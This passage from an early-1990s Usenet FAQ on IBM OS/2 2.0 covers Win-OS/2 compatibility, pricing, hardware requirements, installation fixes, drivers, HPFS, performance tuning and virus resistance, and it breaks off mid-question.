startup, with a default after timeout. The OS/2 1.x DualBoot +method is still available as well. Consult the OS/2 2.0 Installation +Guide for instructions on how to configure your system to use Boot +Manager or DualBoot. Note that OS/2 2.0 need not be installed on Drive +C -- it can reside on other volumes. + +Compatibility with Windows, a popular DOS extender, is provided by Win- +OS/2, an environment based on Microsoft's Windows source code. It runs +Windows 2.x and 3.0 real mode and standard mode applications under OS/2 +2.0, either on a full screen Windows desktop (with the familiar Program +Manager and one or more Windows applications) or "seamlessly," alongside +OS/2 applications on the WPS desktop. "Seamless" operation is available +in VGA and XGA resolutions with OS/2 2.0 as it ships; see Question 11 +for information on third party drivers. + +CVTICO, a popular utility available from the OS/2 shareware/freeware +sources (see Question 9), will convert Windows icons for use by the OS/2 +Icon Editor and/or OS/2-specific programs. (No conversion is necessary +if the icons are to be used with Windows programs running under OS/2 +2.0.) + +OS/2 2.0 directly provides Windows enhanced mode features save one: +services included in WINMEM32.DLL. Windows applications which utilize +this DLL (e.g. Mathematica 2.0, Omnipage Professional 1.0) will not run +under OS/2 2.0. Fortunately the number of WINMEM32 applications is few, +and apparently the vendors of such applications will be shipping OS/2 +2.0 compatible updates. + +Windows applications are well integrated into the overall OS/2 WPS +environment with DDE and Clipboard hooks, and OLE 1.0 is supported among +Windows applications. Adobe Type Manager for Win-OS/2 comes with OS/2 +2.0 (see Question 25). Windows screen (for a full screen desktop) and +printer device drivers will work under Win-OS/2. Such notorious Windows +applications as Word for Windows, Norton Desktop (save portions +described above), Toolbook, and screen savers such as After Dark work +fine under Win-OS/2. Even the Windows Multimedia Extensions (and +programs which utilize them) operate under Win-OS/2. + +Win-OS/2 departs from Microsoft Windows in that it allows more than one +Windows desktop and can preemptively (rather than cooperatively) +multitask Windows applications in separate, robust, protected sessions. +Also, while the enhancements incorporated into Windows 3.1 are +functionally incorporated into Win-OS/2, Win-OS/2 is not technically +Windows 3.1 compatible. IBM has demonstrated 3.1-level Win-OS/2, and it +is widely rumored that a free 3.1-level update will be available this +summer. Aside from the Windows 3.1 applets there are no Windows 3.1- +specific applications available. (Win-OS/2 will run the Windows 3.0 +applets, but it does not include them. Instead, a vast assortment of +true OS/2 2.0 applets are provided, including a spreadsheet, database +program, asynchronous communications program, time planning/scheduling +applets, a true programmer's editor, the System Editor, an icon editor, +games, and much more.) + +------------------------------ + +(5) Where can I buy OS/2? + +Microsoft versions of OS/2 1.x are available only through OEMs (e.g. +Compaq, Dell) or by purchasing Microsoft's LAN Manager 2.1 or SQL Server +products. Microsoft has all but ceased OS/2 development, working +instead on Windows and the future, high-end NT (formerly OS/2 3.0). + +IBM OS/2 Version 2.0 is available from most software dealers (including +Elek-Tek, tel. 708-677-7660) and directly from IBM (tel. 800-3-IBM-OS2, +800-465-1234 in Canada). OS/2 2.0 on 3.5 inch disks is part no. +84F7586. For 5.25 inch disks, 10G2991. Media are high density. For +compact disc, 10G2992. IBM OS/2 Version 1.3 is still available and may +be ordered through many IBM dealers. + +IBM is trying to make OS/2 2.0 available everywhere DOS is purchased. +If your dealer does not stock OS/2 2.0, call IBM's order line and +mention the name of your dealer when you place your order. IBM also has +plans to bundle OS/2 2.0 with new PS/1, PS/2, and non-IBM systems. + +------------------------------ + +(6) How much does OS/2 2.0 cost? + +IBM OS/2 2.0 retails for USD 195. However, in the United States +introductory pricing is available through July 31, 1992, by calling +IBM's order line (800-3-IBM-OS2). Upgrades are free from OS/2 1.x, USD +49 from any version of Windows, USD 99 from any version of DOS, and USD +139 without an upgrade. (An OS/2 1.x to 2.0 upgrade form, which you can +print out and send in, is available from OS/2 shareware/freeware +sources, see Question 9. Version 1.x Extended Edition licensees receive +a free upgrade to OS/2 2.0 and ES/2 1.0; Version 1.x LAN Server +licensees receive LAN Server 2.0 at no charge. All free OS/2 1.x to 2.0 +upgrades are available until August 24, 1992.) Similar promotions are +in effect in Canada and other countries. Special pricing is available +for multiple OS/2 licenses. Educational discounts are available but may +not apply to the introductory prices. (IBM's educational inquiries line +in the U.S. is 800-222-7257.) + +------------------------------ + +(7) What hardware do I need to run IBM OS/2 2.0? Do I need a PS/2? + +You need any PC, PC compatible, PS/1, or PS/2 with at least an 80386SX +CPU, 4 MB (6 MB or more strongly recommended) of RAM (configured as 640K +base plus the remainder as extended memory, with at least 3968K total +RAM after system use), a 60 MB or larger hard disk (with 15-30 MB free), +a supported video adapter (CGA, EGA, VGA, 8514/A, XGA, or third party +driver) with appropriate display, and a high density 3.5 or 5.25 inch +floppy drive for installation. A mouse or other pointing device is +strongly recommended. Allow extra RAM and hard disk space for OS/2- +based networking, ES/2, and/or extra system loads (i.e. an extraordinary +number of large applications running simultaneously). When calculating +hard disk space requirements, subtract space occupied by files already +on the hard disk which are functionally included in OS/2 2.0 and may be +deleted, e.g. DOS, a 386 memory manager, Windows, Adobe Type Manager +with base typefaces, etc. + +The WPS will not operate with the Monochrome Display Adapter or the +Hercules Monochrome Graphics Adapter. Usually the WPS will fail to work +with monochrome EGA. However, some EGA adapters (e.g. Paradise +Monochrome EGA Card, ATI EGA Wonder) will emulate all color EGA modes on +TTL monochrome monitors and, thus, will work with the WPS. + +On (E)ISA bus machines, OS/2 specifically supports hard drive adapters +which conform to the Western Digital chipset interface standard (i.e. +nearly all MFM, RLL, IDE, and ESDI adapters) and Adaptec, Future Domain, +and IBM SCSI adapters. In addition, "generic" INT13 support is provided +for all other hard disk adapters. This "generic" support even embraces +such devices as Iomega's Bernoulli and SyQuest's removeable media +products. CD-ROM support is included as well. At present the OS/2 CD- +ROM driver does not work with all brands, but the DOS device drivers, +when suitably configured and installed, will still provide CD-ROM +services to DOS/Windows programs. Printer and plotter support is +discussed in Question 12. + +Version 2.0 is explicitly supported on PC compatibles. IBM is offering +a money back compatibility guarantee in the United States. Should OS/2 +2.0 fail to work on your compatible within the first 90 days of use, and +should IBM be unable to fix the problem, your purchase price will be +refunded. To date over 200 non-IBM models have been tested in IBM's own +labs. + +------------------------------ + +(8) What applications are available for OS/2? + +In addition to the thousands of applications available for DOS and +Windows, there are a couple thousand OS/2-specific applications +representing almost every category imaginable. + +The DOS/Windows applications with 16-bit OS/2-specific counterparts +include Lotus 1-2-3, Freelance, Microsoft Word, Excel, Multiplan, Aldus +Pagemaker, Ventura Publisher, Corel Draw, WordPerfect, DisplayWrite, +DeScribe, Micrografx Designer, AutoCAD, Oracle, RBase, SAS, SPSS, +HyperAccess/5, DynaComm, Pro-YAM, Borland Sidekick, Paradox, Wingz, +Brief, QEdit, 4DOS, and many others. In some cases DOS and OS/2 +versions ship together (e.g. Microsoft Word 5.5, Lotus 1-2-3 3.0, +Wingz). + +OS/2 2.0 provides an attractive, 32-bit, Workplace Shell environment for +new applications; many do not have DOS/Windows predecessors. This new +class of 32-bit applications will include Lotus 1-2-3, Freelance, +cc:Mail, Notes, AmiPro, WordPerfect 6.0, N/Joy, DeScribe, Publisher's +Paintbrush, PFS:Works, CorelDraw, HyperAccess, Sybase, FAX/PM, and many +more. Over 1000 new 32-bit OS/2 2.0 applications are slated for release +in the next year. + +OS/2-specific versions of popular utilities include PKZIP/UNZIP, SEA's +ARC, LHA, Zoo 2.1, many GNU tools, tens of different file finders, +desktop clocks, calculators, and many more. Programming languages +include Assembler, C++, COBOL, Pascal, C, Fortran, BASIC, REXX (included +with every copy of OS/2 2.0), Smalltalk, Modula-2, LISP, Forth, and +still more, from vendors such as Borland, Jensen and Partners +International, Watcom, Symantec (through its Zortech subsidiary), IBM, +Microway, and many more. A full 32-bit development package, GNU C/C++ +2.1, is available from OS/2 shareware/freeware sources (see Question 9). + +The IBM NSC BBS (tel. 404-835-6600) provides an online product database +of OS/2-specific software. A directory of OS/2 applications, IBM +document number G362-0029-00, is published by Graphics Plus, tel. 800- +READ-OS2. TINF is an applications listing (for use with the OS/2 help +facility) available from the shareware/freeware sources listed below. + +------------------------------ + +(9) Where can I obtain OS/2 shareware and freeware? + +Many BBSes hold large OS/2 libraries. Fernwood (tel. 203-483-0348) has +over 50 MB worth. The OS/2 Shareware BBS (703-385-4325), Bay Area OS/2 +BBS (510-657-7948), and Greater Chicago Online (708-895-4042) carry +still more. The IBM NSC BBS has some shareware/freeware as well, along +with CSDs (see Question 24) and the PS/2 Assistant (an invaluable +resource for locating almost any sort of information on OS/2). IBM +Canada maintains several support BBSes (604-664-6466, 416-946-4255, and +514-938-3022 at 2400 bps; 604-664-6464 and 416-946-4244 at 9600 bps). +Information on IBM's new OS/2 BBS is included in the OS/2 2.0 package. + +The Usenet conference comp.binaries.os2 carries OS/2 software. And +several sites are available via anonymous ftp. (No ftp? Send a single +line message with the word HELP to bitftp@pucc.bitnet or +ftpmail@decwrl.dec.com to learn about ftp mail servers.) They include +(with Internet node numbers and subdirectories): + +hobbes.nmsu.edu 128.123.35.151 pub/os2, pub/os2-1.x +mtsg.ubc.ca 137.82.27.1 os2: +luga.latrobe.edu.au 131.172.2.2 pub/os2 +msdos.archive.umich.edu 141.211.164.153 msdos/os2 +funic.funet.fi 128.214.6.100 pub/os2 +sun0.urz.uni-heidelberg.de 129.206.100.126 pub/os2 +novell.com 130.57.4.1 os2 + +The last site should not be accessed weekdays from 8:00 a.m. to 5:30 +p.m. Pacific Time. + +Other sources include CompuServe ("GO IBMOS2") and a Bitnet/EARN archive +(send a single line message with the word HELP to +LISTSERV@BLEKUL11.BITNET for more information). + +------------------------------ + +(10) I am having trouble installing OS/2 2.0. What should I do? + +First consult the Installation Guide and other materials accompanying +OS/2 2.0. Make sure your PC meets the system requirements in Question +7. + +And if the following instructions do not help, fall back on IBM's toll +free technical support (available in the U.S. and described in the OS/2 +2.0 package). + +Certain PC compatibles have difficulty accepting OS/2 2.0 (CSD level +02000 only; see Question 24), particularly AT bus systems with RLL, MFM, +ESDI, or certain SCSI adapters (e.g. AMI SCSI adapters). The problem +usually appears in the form of FDISK errors, extremely slow copying to +the hard disk, or a whining/grating noise emanating from the hard disk. + +IBM suggests a simple workaround. First, DISKCOPY Diskette 1 of your +OS/2 2.0 package. Set aside your original Diskette 1 and use the copy +from now on as if it were the original. Using a text editor, modify the +CONFIG.SYS file on Diskette 1 (the copy), replacing the line +"basedev=ibm1s506.add" with "rem basedev=ibm1s506.add." Boot the +Installation Disk, and proceed through the installation procedure +through the first five diskettes, then reinsert the Installation +Diskette as directed. Then after files have been copied from the +Installation Diskette the system prompts you to remove the diskette and +press ENTER to reboot. Do so, but immediately reinsert the Installation +Diskette as soon as the screen clears. Follow instructions (insert +Diskette 1 and press ENTER when prompted), then press ESC when prompted. +At the OS/2 command line, type: + RENAME C:\OS2\IBM1S506.ADD IBM1S506.XXX + COPY C:\OS2\IBMINT13.ADD C:\OS2\IBM1S506.ADD +replacing C: with the appropriate drive if you are installing elsewhere. +Remove Diskette 1, then press CTRL-ALT-DEL to reboot and to finish +installation. + +The mouse selection menu provided when installing is a bit confusing. +The Logitech Mouse selection should be chosen if you have a Mouse +Systems PC Mouse or a Logitech C7 or C9 serial mouse ONLY. If you have +another Logitech pointing device, it is Microsoft compatible when +powered up, so select the appropriate Microsoft driver. If you are +using a Logitech C7 or C9 mouse and have been using native DOS, be sure +to issue the command MOUSE PC (or MOUSE 2 PC if your mouse is attached +to COM2) before booting into or installing OS/2. Alternatively, turn +off the system (to reset the mouse) before booting or installing OS/2. +(The Logitech Support BBS can be reached at 510-795-0408.) + +Some PCs have trouble printing under OS/2 2.0. This problem can often +be traced to an interrupt conflict, or a substandard cable or printer +adapter. LPT1 uses IRQ 7 and LPT2, if installed, uses IRQ 5. +Interrupts should not be shared on AT bus machines. The SoundBlaster +card, for example, comes set to IRQ 7. Reset it to an unused interrupt. + +Make sure adapters with on board ROMs are not conflicting with other +adapters. For example, many SuperVGA adapters use large chunks of upper +memory, and many hard disk adapters have on board ROMs which can be +mapped into this area and conflict. Adapters must cooperate in their +use of memory and interrupts and must not share address space or +interrupts. Check your product manuals for more help. + +Be sure adequate free disk space is available before installing, +including space for a swap file. Drives compressed using Stacker or +similar utilities should be uncompressed before installing (unless +access to these drives is not needed). OS/2 2.0 is not presently +compatible with Stacker or similar utilities. However, an OS/2 2.0 +version of Stacker is forthcoming. + +Do not select HPFS when installing if your machine has 6 MB of RAM or +less. Doing so will likely result in diminished performance. + +Automatic migration of your CONFIG.SYS and AUTOEXEC.BAT files is not +recommended. If you have Windows 3.1 installed on your system do not +migrate your Windows desktop. + +Be sure your CMOS setup parameters are set correctly, especially those +relating to floppy drives. + +Be certain your adapter's sector translation mode is enabled if you are +using an MFM, RLL, or ESDI hard disk drive with more than 1024 +cylinders. The 1024 cylinder limit is a BIOS constraint. + +Certain Quantum IDE hard disk drives require a free ROM update from the +manufacturer to work with OS/2. + +"Autoswitching" on non-IBM EGA adapters should be disabled (usually with +a DIP switch or jumper setting). In rare cases it may be necessary to +switch third party VGA adapters into 8-bit mode. + +OS/2 is particularly sensitive to bad RAM (often reflected in TRAP 2 +error messages). Use a thorough RAM testing utility, and try not to mix +9 chip and 3 chip SIMMs/SIPPs. + +The HP DeskJet and DeskJet Plus printers work, without loss of +functionality, using the Epson EPL-7000 driver (with Fast System Fonts +disabled and bin selection ignored). An explicit choice at installation +is provided for the DeskJet 500 -- look carefully. The Epson EPL-7000 +driver may also be used to operate the DeskJet 500. As of this writing +a DeskJet 500C color driver (for OS/2-specific programs) is not yet +available. + +Allow several minutes for OS/2 2.0 to build your desktop (and display +icons) at the end of installation -- take the Tutorial offered to you in +the meantime. Select Shutdown and reboot once after installation +completes to ensure that DOS/Windows applications will operate properly. +Avail yourself of the "Start Me" icon, the other online help, and the +README file located in the root directory. They will help in getting +started with the Workplace Shell, the new paradigm introduced with OS/2 +2.0, and in properly configuring your system. + +When installing over a beta version of OS/2 be sure to reformat. + +------------------------------ + +(11) Will OS/2 2.0 work with my SuperVGA adapter? + +If you have a SuperVGA adapter, OS/2 2.0 should initially be installed +using the standard VGA driver. (If you have an ATI Vantage or Ultra +adapter, or some other 8514/A hardware compatible adapter, install using +the 8514/A driver.) Then consult the README file OS/2 copies to your +root directory for more information on SuperVGA support. + +OS/2 2.0 comes with basic mode switching capabilities to handle +applications which utilize SuperVGA modes. If OS/2 2.0 detects a +SuperVGA adapter it will list two SuperVGA support files, VSVGA.SYS and +BVHSVGA.DLL, in your CONFIG.SYS file. (A replacement VSVGA.SYS file, +fixing Tseng 4000 and TRAP E problems, is available from +shareware/freeware sources under the name VSVGAFX1; see Question 9.) +But to enable this mode switching support you must start a DOS full +screen session, issue the command SVGA ON, EXIT, Shutdown, and reboot. +SVGA ON creates a text file called \OS2\SVGADATA.PMI which describes +your SuperVGA adapter to the system. Then you may install high +resolution drivers. Aside from DOS applications (which may require +their own drivers), OS/2 2.0 requires up to three high resolution +support files: + +\OS2\DLL\DISPLAY.DLL Workplace Shell display driver +\OS2\MDOS\WINOS2\SYSTEM\VGA.DRV Win-OS/2 full screen driver +\OS2\MDOS\WINOS2\SYSTEM\SWINVGA.DRV Win-OS/2 "seamless" driver + +You may replace any one of these individually for high resolution +operation in each given mode, but be sure to keep a backup copy of the +original file(s). The "seamless" Win-OS/2 and WPS desktop driver files +must match (in terms of resolution and number of colors) if you wish to +run Windows programs "seamlessly." Any suitable Windows 3.0 SuperVGA +driver will work as a Win-OS/2 full screen driver, but be sure to use +the EXPAND utility (as described in README) when installing. + +OS/2 1.3 SuperVGA drivers often serve, with some limitations, as WPS +desktop drivers. Use the command DDINSTAL to replace DISPLAY.DLL. +Setting IOPL=YES in CONFIG.SYS may be required when installing a new +DISPLAY.DLL. + +As of this writing Trident is the only third party vendor with OS/2 2.0 +high resolution drivers, although several other manufacturers have +promised drivers. When available they will be provided through OS/2 +shareware/freeware sources (see Question 9). + +IBM was unable to test all SuperVGA adapters, so if you are experiencing +problems report them through IBM's toll free support (in the U.S., +described in the OS/2 2.0 package) or to the adapter manufacturer. + +------------------------------ + +(12) Will OS/2 2.0 work with my printer? + +OS/2 2.0 includes support for the Hewlett-Packard LaserJet, DeskJet (see +Question 10), and PaintJet families; IBM ExecJets, Proprinters, +Quickwriters, Quietwriters, Pageprinters, and Laserprinters; Epson dot +matrix and laser printers; Postscript devices; and other printers (e.g. +Panasonic) compatible with these families. A variety of IBM and HP +plotters is also supported. + +DOS/Windows printer drivers continue to work for DOS/Windows +applications. OS/2 2.0 includes a large assortment of Windows printer +drivers for Win-OS/2. If necessary install Windows printer drivers +using the Win-OS/2 Control Panel. OS/2 2.0 and OS/2 1.3 printer drivers +are interchangeable. + +If your printer is not compatible with one of the drivers supplied with +OS/2, check with the printer manufacturer first then with OS/2 +shareware/freeware sources (see Question 9). If you own an IBM printer, +check with the Lexmark BBS (tel. 606-232-5653). + +------------------------------ + +(13) How do I access HPFS partitions on my hard drive without booting + from the hard drive? I'm getting error messages now -- how do I + "repair" my hard disk? + +With IBM OS/2 2.0, insert the Installation Diskette, Shutdown (if +necessary), and reboot. When prompted insert Diskette 1 and press +ENTER. When prompted, press ESC. You will be given an OS/2 command +line prompt. From there you can make necessary changes to your hard +disk -- an OS/2 character mode text editor is handy for such changes. +(Make sure you backup CONFIG.SYS before making any changes so that you +can easily revert to the old version should things go wrong.) + +You may use this diskette boot method to run CHKDSK on your DOS FAT, +OS/2 FAT, or OS/2 HPFS partitions. After you reach the command line, +insert Diskette 2. Then type A:\CHKDSK X: /F to repair most kinds of +damage to your hard disk, replacing X with the appropriate drive letter. +OS/2 CHKDSK will also remark your hard disk, if possible, as accessible +should OS/2 "lock it out" for some reason. + +The best way to avoid the need to perform CHKDSK is to always select +Shutdown. Click on the Workplace Shell desktop background using mouse +button two to bring up the appropriate menu. Also, avoid deleting OS/2- +related files when using native DOS. + +------------------------------ + +(14) I can't install OS/2 2.0 from Drive B. What's wrong? + +IBM OS/2 2.0 can only be installed from Drive A, like DOS (unless your +BIOS supports booting from Drive B), or across a network (contact IBM +for more information on network installation procedures). If you have +the wrong disk size go back to your dealer and obtain the correct media. +Otherwise you could go inside your machine and swap floppy drive cable +connectors, use your system's setup utility to set the new CMOS +parameters, and then install OS/2 from the "new" Drive A. Sometimes the +floppy drive cable connectors will not be the same. If so you can +obtain an adapter plug. + +------------------------------ + +(15) Is there a Norton Utilities for OS/2? + +Not yet, although Norton Desktop, Norton Utilities, and Norton Commander +all work under OS/2 2.0's DOS/Windows sessions (with limitations noted +in Question 4). But the GammaTech Utilities should fill the role. +Contact their publisher at tel. 405-359-1219. Note that OS/2 2.0 has a +built-in UnDelete utility (see the README file or online help), and HPFS +is resistant to fragmentation (see Question 18). + +------------------------------ + +(16) Sometimes OS/2 2.0 will freeze when I run an application? What do + I do? + +Before rebooting with CTRL-ALT-DEL, try CTRL-ESC. Do not hit additional +keys, do not move the mouse. Wait up to a minute. In most cases the +Window List or an error message will pop up. If you wish you may close +the offending application at that point. Try ALT-ESC if you have +disabled CTRL-ESC in that application's DOS Settings. + +------------------------------ + +(17) My dealer doesn't know OS/2 from Unix. How can I get answers to + my OS/2 questions? + +If your question is not answered in this List, post a note to the +appropriate Usenet conference: comp.os.os2.apps carries discussions +related to finding or using any application running under OS/2, +comp.os.os2.programmer addresses anything related to OS/2 programming, +and comp.os.os2.misc is for any other OS/2-related discussion. These +groups are watched closely by IBM's OS/2 development team. Also, +comp.lang.rexx discusses REXX programming. BLEKUL11 (on Bitnet/EARN) +distributes its own OS/2 conference by mail; send a single line message +with the word HELP to LISTSERV@BLEKUL11.BITNET for full instructions. +An unedited mailing list is also available; send a single line message +with the word HELP to LISTSERV@FRORS12.BITNET. + +Your local FidoNet BBS may carry OS/2 echo conferences. If not, ask +your system operator to get ahold of them. CompuServe ("GO IBMOS2") and +Prodigy are also excellent resources. + +The IBM NSC BBS was established as a support forum. That BBS's message +areas, product database, and PS/2 Assistant file(s) are invaluable +resources. Information on the new OS/2 BBS is included in the OS/2 2.0 +package. In the United States IBM has toll free technical support +(described in the OS/2 2.0 package; report problems there), an OS/2 +Hotline (general information, orders, upgrades, tel. 800-3-IBM-OS2), the +HelpWare Center (tel. 800-PS2-2227), and an educational inquiries line +(see Question 6). In Canada call IBM Personal Systems Software at 800- +465-1234. OS/2 2.0 developers should contact the IBM Developer +Assistance Program at 407-982-6408. IBM offers classes worldwide to +help in using and programming OS/2 2.0; call your local IBM branch +office (or the OS/2 Hotline) for more information. + +OS/2 has its own magazines as well. To subscribe to IBM Personal +Systems Developer, a quarterly publication, telephone 407-982-1105. For +information on OS/2 Monthly send netmail to JDS Publishing at +72550.2440@compuserve.com or telephone 908-985-8358. + +OS/2 2.0 books include Deitel and Kogan, "The Design of OS/2," Addison- +Wesley, ISBN 0-201-54889-5; and Que's "Using OS/2 2.0." Your bookstore +should be able to order these and other titles. + +Any of the regular DOS or Windows resources (e.g. books, magazines, +shareware/freeware sources) will be useful since both environments come +with OS/2 2.0. + +------------------------------ + +(18) Why should I use HPFS? What does it offer me? Does it work with + DOS? + +HPFS offers long file names (up to 254 characters including the path, +greatly exceeding the "8 dot 3" limit in FAT/DOS file systems), +resistance to file fragmentation, improved media error handling, and +speedier disk operation, particularly on large hard disks, on systems +with more than 6 MB of RAM. HPFS is not case sensitive, although it +does preserve case in file names. + +However, HPFS is not currently supported on removeable media, although +some programs (e.g. BACKUP) preserve long file names on such FAT disks. +Also, native mode DOS cannot access a HPFS partition. However, +DOS/Windows sessions running under OS/2 can use all files that conform +to the "8 dot 3" naming conventions, even if they are stored on HPFS +volumes. + +------------------------------ + +(19) I'm a Unix wizard. How do I make OS/2 resemble Unix? + +A great number of GNU and Unix utilities have been ported to OS/2 native +mode and are available from the shareware/freeware sources listed above. +A uucp package, UUPC/Extended, is available via anonymous ftp from +sun.soe.clarkson.edu, directory pub/uupc; netmail help@kew.com with +questions. + +In addition, the Hamilton C Shell is available from Hamilton Labs, tel. +508-358-5715 or netmail 3890321@mcimail.com. The Thompson Toolkit, a +Bourne-like shell, is published by Thompson Automation, tel. 206-224- +1639. Thompson offers a version of awk as well. MKS (tel. 519-884-2251 +or netmail pat@mks.com) publishes a number of standard Unix utilities +for OS/2. Argosoft (tel. 510-795-7921) publishes ARGO/UX, a BSD 4.3 +Unix compatible environment. For OS/2-specific X Windows server +support, IBM provides an optional package available with its TCP/IP 1.2 +for OS/2. The TCP/IP 1.2 base package includes a news reader as a +sample application. + +DOS and Windows based utilities and aids still work fine under OS/2 2.0. + +------------------------------ + +(20) I prefer Windows. How do I make OS/2 2.0 resemble Windows (or + OS/2 1.3)? + +At first the Workplace Shell may seem strange and different. Use it for +a while and then decide. + +If you still feel you want change how OS/2 2.0 works, follow the +instructions beginning on p. 29 in the "Migrating to the OS/2 Workplace +Shell" booklet. + +------------------------------ + +(21) I would like to set up an OS/2 BBS. What is available? + +OS/2 is an excellent environment for BBS operation (even using +DOS/Windows software), including large multiline facilities. Related +software will enable FidoNet capabilities, gateways to Usenet/UUCP, +nodelist processing, additional file transfer protocols, and more. + +Five popular OS/2-specific BBSes are Maximus and Simplex (available from +the shareware/freeware sources listed above), Omega Point/2 (BBS tel. +404-564-1961), Magnum (tel. 818-706-9800, BBS tel. 818-706-9805), and +Multi-Net (tel. 503-883-8099, BBS tel. 503-883-8197). + +------------------------------ + +(22) Can I use COM3 and COM4 in OS/2? + +COM3 and COM4 are supported on PS/2s without any additional effort. On +(E)ISA machines, some additions are required to CONFIG.SYS. Using a +text editor, include "(port number, base address, interrupt number)" +parameters next to the COM.SYS and VCOM.SYS filenames. One example: + DEVICE=C:\OS2\COM.SYS (3,3E8,5) (4,2E8,3) + DEVICE=C:\OS2\MDOS\VCOM.SYS (3,3E8,5) (4,2E8,3) +You do not have to include parameters for COM1 and COM2 (unless they are +somehow nonstandard). + +Note that AT bus COM ports cannot be used at the same time if they share +interrupts because of bus design limitations (cf. Roger C. Alford, +"Under the Hood: How Interrupts Work," Byte, February, 1992, pp. 249- +256). PolyCom, a replacement driver available from the OS/2 +shareware/freeware sources (see Question 9), supports up to eight ports +with the right hardware. + +"Smart" (coprocessor controlled) multiport communication adapters should +be used when installing more than four ports. Such an adapter will work +with OS/2 if the manufacturer has written an appropriate driver. +Examples include IBM's ARTIC products, Digitalk (tel. 213-645-1082) and +Stargate (tel. 800-782-7428) adapters. + +------------------------------ + +(23) How do I start a background process from the OS/2 command line? + +Look up the START and DETACH commands in the online Command Reference. + +------------------------------ + +(24) What are CSDs, how do I tell which I have, and where do I get + them? + +CSDs are Corrective Service Diskettes, or bug fixes, periodically issued +by IBM. The OS/2 CSD level number may be obtained using the command +SYSLEVEL from the OS/2 command line prompt. CSDs are cumulative, i.e. +only the most recent CSD is required to bring a system up from any +previous CSD level. However, CSDs only apply within a major version +number. For example, an upgrade, not a CSD, would bring OS/2 Version +1.3 up to Version 2.0. Note also that each national language (e.g. +French, U.K. English) uses a distinct CSD. + +CSDs may be ordered by anyone with an IBM customer number (usually large +sites) directly from IBM Defect Support (tel. 800-237-5511). OS/2 users +without customer numbers should ask authorized IBM dealers to order CSDs +from that source. Many dealers do not know about this program, so be +persistent. CSDs may also be downloaded from the IBM NSC BBS, +CompuServe ("GO IBMOS2"), or from other OS/2 shareware/freeware sources +(see Question 9). And CSDs may be ordered through IBM's new OS/2 BBS. + +The most recent OS/2 2.0 CSD level will be listed in this List and in +the PS/2 Assistant files. + +------------------------------ + +(25) How do I add new Adobe Type Manager typefaces? + +OS/2 2.0 comes with built-in Adobe Type Manager for OS/2 and Win-OS/2. +A basic set of typefaces comes with OS/2 2.0 and is installed for use +under OS/2's ATM. To install these same typefaces for use under Win- +OS/2's ATM, go to the Win-OS/2 ATM Control Panel and install the +typefaces from Printer Diskette 5. + +Each typeface should come with three separate files with PFB, AFM, and +PFM extensions. To install a typeface for use under Win-OS/2, use the +ATM Control Panel. To install a typeface for use with OS/2-specific +applications, select OS/2 System -> System Setup -> Font Palette -> Edit +Font... -> Add. + +PFM files may converted to AFM files using the PFM2AFM utility, +available from many OS/2 shareware/freeware sources (see Question 9). +Also, AFM files for Adobe commercial typefaces can be obtained via +netmail; send a single line message with the word HELP to ps-file- +server@adobe.com for instructions. + +With the exception of the basic set of typefaces that comes with OS/2 +2.0, typeface files may be shared by OS/2 ATM and Win-OS/2 ATM. To do +so, install the typefaces to a directory listed in LIBPATH in CONFIG.SYS +(most conveniently \OS2\DLL). + +------------------------------ + +(26) How do I tweak OS/2 2.0 for maximum performance? + +For OS/2 overall, the parameters MAXWAIT, TIMESLICE, PRIORITY, +PRIORITY_DISK_IO, and cache settings (in the DISKCACHE and/or IFS lines) +can be tweaked. These parameters are documented in the online Command +Reference. + +If not using HPFS (which should only be used on systems with more than 6 +MB of RAM), periodically defragment FAT partitions using an appropriate +utility. A shareware defragmenter for DOS called DOG (Disk OrGanizer) +works well. (You can boot DOS from a floppy disk to run such a +utility.) + +For the Workplace Shell, drag shadows of most often used items to the +desktop or folders closer to the "surface" -- opening folders takes +time. Drag shadows of programs you use often (e.g. the Win-OS/2 full +screen Program Manager) to the Startup folder. Disable animation (go to +OS/2 System -> System Setup -> System -> Window). + +For DOS programs, run full screen instead of windowed if speed is +important. In DOS Settings for each application: reduce conventional, +XMS, DPMI, and EMS memory allocations to the bare minimum required for +maximum performance; turn off VIDEO_RETRACE_EMULATION unless necessary; +adjust IDLE_SENSITIVITY; turn off DOS_BACKGROUND_EXECUTION if not +needed; change the HW_TIMER setting (particularly for games); enable +VIDEO_FASTPASTE if possible. Communications programs should use +hardware handshaking where possible (use OS/2's MODE COMx command if +necessary), and a buffered UART can prove helpful. For faster printing +set the DOS program's output port to LPTx.OS2 (where x is the printer +port number) -- use a "print to file" option if necessary. Other, +standard steps to enhance DOS performance (e.g. increasing BUFFERS in +CONFIG.SYS) of course apply. + +For Windows programs, run using a full screen desktop if speed is vital. +The Win-OS/2 Full Screen icon set up by the installation program has +poor Settings. For better performance perform some of the same steps +outlined in the preceding paragraph. The same advice applies for +printer output. In addition, the Print Manager should be disabled (OS/2 +provides a systemwide spooler). From the Win-OS/2 desktop close the +Print Manager, uncheck the "Use Print Manager" box from the Win-OS/2 +Control Panel -> Printers section, then, using a text editor, edit the +\OS2\MDOS\WINOS2\SYSTEM.INI file, removing the ",!printman" entry from +the MAVDMApps line. (This last step will keep a warning dialog box from +appearing each time you start the Win-OS/2 desktop.) Consider disabling +the Public setting in the Clipboard. + +Try reducing the number of on screen colors or dropping down in screen +resolution to enhance speed. Close (not just minimize; check the Window +List) unnecessary objects and applications. Consider adding more RAM. + +Shadow RAM should be disabled (using your system's CMOS setup program) +for best performance unless that RAM is not released by the system for +use by OS/2. + +------------------------------ + +(27) What networking products are available for OS/2 2.0? + +In addition to DOS/Windows products, OS/2-specific TCP/IP support is +available from IBM, Essex Systems (tel. 508-532-5511), FTP Software +(send netmail to info@ftp.com), and others. NetWare Requester for OS/2 +is available from Novell; NetWare server has been demonstrated by IBM. +IBM offers both NetWare and LAN Server 2.0 (basic and advanced) with LAN +Requesters. Microsoft offers LAN Manager 2.1 (which comes bundled with +OS/2 1.3) and is working on an OS/2 2.0-specific network requester. DEC +sells Pathworks for OS/2. [Banyan Vines? Others?] + +------------------------------ + +(28) Should I worry about viruses when running OS/2 2.0? + +At present there are no OS/2-specific viruses. However, DOS/Windows +viruses can conceivably infect an OS/2 2.0 system. DOS/Windows +antivirus tools are just as useful in preventing such infection. Also, +IBM has an antivirus package which runs under OS/2 directly (without +DOS/Windows emulation), and others are on the way. + +But OS/2 2.0 is likely to be much more resistant to viruses because of +its design. Viruses running in one virtual DOS/Windows session are +likely to be confined to that session. Low level disk access is +curtailed under OS/2 2.0, thus preventing most virus infection at that +level. And when a DOS/Windows virus does trigger, it is far less likely +to disrupt the entire system. + +OS/2 2.0 is by no means virus proof -- no system is. But it should +prove more resistant to virus infection. + +------------------------------ + +(29) Are there any clever tricks that apply to OS/2 2.0? + +If you 